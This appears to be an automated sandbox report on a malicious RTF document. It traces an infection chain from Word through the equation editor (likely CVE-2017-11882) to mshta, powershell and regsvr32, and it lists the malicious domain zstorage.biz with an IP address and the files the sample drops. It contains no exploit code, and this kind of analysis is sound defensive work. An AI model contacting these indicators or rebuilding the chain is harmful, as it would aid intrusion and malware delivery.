  • Is malicious
behavior_graph main Behavior Graph ID: 37746 Sample:  5ZFXLxew8B.rtf Startdate:  21/11/2017 Architecture:  WINDOWS Score:  80 2 EQNEDT32.EXE 47 main->2      started     1 WINWORD.EXE 54 19 main->1      started     13402sig Office equation editor starts processes (likely CVE 2017-11882) 6433sig Encrypted powershell cmdline option found 7783sig Installs new ROOT certificates 8753sig Suspicious powershell command line found 5237sig Drops files with a non-matching file extension (content does not match file extension) 13397sig Powershell connects to network 13377sig Powershell drops PE file 6129sig Blacklisted process start detected (Windows program) d1e459656 zstorage.biz 185.82.23.166, 443 DE-FIRSTCOLOwwwfirst-colonetDE Germany d1e450833 zstorage.biz d1e450892 zstorage.biz d1e289823 IkqJfeZNVt.txt, PE32 d1e425557 msxsl.exe, PE32 2->13402sig 3 mshta.exe 18 2->3      started     3->6433sig 3->7783sig 3->8753sig 3->d1e459656 3->d1e450833 7 powershell.exe 12 7 3->7      started     7->5237sig 7->13397sig 7->13377sig 7->d1e450892 7->d1e289823 dropped 9 regsvr32.exe 2 4 7->9      started     9->6129sig 9->d1e425557 dropped 11 msxsl.exe 9->11      started     process1 signatures1 process3 dnsIp3 signatures3 process7 dnsIp7 fileCreated7 signatures7 process9 fileCreated9 signatures9 process11 fileCreated1 fileCreated3

Simulations

Behavior and APIs

TimeTypeDescription
22:21:14API Interceptor114x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
22:21:15API Interceptor7x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 500ms
22:21:16API Interceptor80x Sleep call for process: mshta.exe modified from: 60000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot